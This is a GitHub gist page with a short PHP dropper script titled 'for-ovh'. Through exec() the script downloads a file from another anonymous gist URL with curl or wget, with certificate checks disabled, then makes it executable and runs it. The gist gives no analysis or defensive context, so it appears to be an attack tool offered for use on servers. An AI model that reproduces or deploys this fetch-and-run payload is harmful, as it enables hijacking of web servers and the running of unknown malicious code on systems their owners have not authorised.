Skip to content

Instantly share code, notes, and snippets.

@kieguin
Created January 16, 2018 14:15
Show Gist options
  • Save kieguin/e6746070ab9a9710215a0cf11846cc43 to your computer and use it in GitHub Desktop.
Save kieguin/e6746070ab9a9710215a0cf11846cc43 to your computer and use it in GitHub Desktop.
for-ovh
<?php
//with love from moscow <3
exec('if curl -s 127.0.0.1 -o /dev/null 2>/dev/null; then curl -s --insecure -o 500 https://gist.githubusercontent.com/anonymous/cc200818fd964d31f35ff8be3a212a8f/raw/38b41b6f5893ed9b08596d13cf559cebed60f14d/gistfile1.txt && chmod 777 500 && ./500; else wget --no-check-certificate -O 500 https://gist.githubusercontent.com/anonymous/cc200818fd964d31f35ff8be3a212a8f/raw/38b41b6f5893ed9b08596d13cf559cebed60f14d/gistfile1.txt && chmod 777 500 && ./500; fi');
echo 'done';
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment